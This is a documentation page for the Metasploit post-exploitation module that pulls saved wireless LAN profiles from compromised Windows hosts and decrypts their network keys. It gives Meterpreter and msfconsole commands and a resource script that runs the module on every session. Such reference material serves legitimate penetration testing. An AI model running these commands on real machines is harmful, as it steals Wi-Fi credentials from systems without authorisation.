Windows Gather Wireless Profile - Metasploit


This page contains detailed information about how to use the post/windows/wlan/wlan_profile metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather Wireless Profile
Module:
Source code:
Disclosure date: -
Last modification time:
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.

Module Ranking and Traits


Module Ranking:

  • : More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/wlan/wlan_profile

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/wlan/wlan_profile
msf post(wlan_profile) > show options
    ... show and set options ...
msf post(wlan_profile) > set SESSION session-id
msf post(wlan_profile) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/wlan/wlan_profile")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/wlan/wlan_profile post exploitation module looks in the msfconsole:

msf6 > use post/windows/wlan/wlan_profile

msf6 post(windows/wlan/wlan_profile) > show info

       Name: Windows Gather Wireless Profile
     Module: post/windows/wlan/wlan_profile
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  theLightCosine <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts saved Wireless LAN profiles. It will also try 
  to decrypt the network key material. Behavior is slightly different 
  between OS versions when it comes to WPA. In Windows Vista/7 we will 
  get the passphrase. In Windows XP we will get the PBKDF2 derived 
  key.

Module Options


This is a complete list of options available in the windows/wlan/wlan_profile post exploitation module:

msf6 post(windows/wlan/wlan_profile) > show options

Module options (post/windows/wlan/wlan_profile):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/wlan/wlan_profile post exploitation module:

msf6 post(windows/wlan/wlan_profile) > show advanced

Module advanced options (post/windows/wlan/wlan_profile):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/wlan/wlan_profile module can do:

msf6 post(windows/wlan/wlan_profile) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/wlan/wlan_profile post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/wlan/wlan_profile) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Couldn't open WlanAPI Handle. WLAN API may not be installed on target


Here is a relevant code snippet related to the "Couldn't open WlanAPI Handle. WLAN API may not be installed on target" error message:

31:	    @host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)
32:	    @wlanapi = client.railgun.wlanapi
33:	    wlan_info = "Wireless LAN Profile Information \n"
34:	    wlan_handle = open_handle()
35:	    unless wlan_handle
36:	      print_error("Couldn't open WlanAPI Handle. WLAN API may not be installed on target")
37:	      print_error("On Windows XP this could also mean the Wireless Zero Configuration Service is turned off")
38:	      return
39:	    end
40:	    wlan_iflist = enum_interfaces(wlan_handle)
41:	

On Windows XP this could also mean the Wireless Zero Configuration Service is turned off


Here is a relevant code snippet related to the "On Windows XP this could also mean the Wireless Zero Configuration Service is turned off" error message:

32:	    @wlanapi = client.railgun.wlanapi
33:	    wlan_info = "Wireless LAN Profile Information \n"
34:	    wlan_handle = open_handle()
35:	    unless wlan_handle
36:	      print_error("Couldn't open WlanAPI Handle. WLAN API may not be installed on target")
37:	      print_error("On Windows XP this could also mean the Wireless Zero Configuration Service is turned off")
38:	      return
39:	    end
40:	    wlan_iflist = enum_interfaces(wlan_handle)
41:	
42:	    if wlan_iflist.empty?

No wireless interfaces


Here is a relevant code snippet related to the "No wireless interfaces" error message:

38:	      return
39:	    end
40:	    wlan_iflist = enum_interfaces(wlan_handle)
41:	
42:	    if wlan_iflist.empty?
43:	      print_status("No wireless interfaces")
44:	      return
45:	    end
46:	
47:	    # Take each enumerated interface and gets the profile information available on each one
48:	    wlan_iflist.each do |interface|

There was an error closing the Handle


Here is a relevant code snippet related to the "There was an error closing the Handle" error message:

64:	    # close the Wlan API Handle
65:	    closehandle = @wlanapi.WlanCloseHandle(wlan_handle, nil)
66:	    if closehandle['return'] == 0
67:	      print_status("WlanAPI Handle Closed Successfully")
68:	    else
69:	      print_error("There was an error closing the Handle")
70:	    end
71:	  end
72:	
73:	  def open_handle
74:	    begin

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • theLightCosine

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.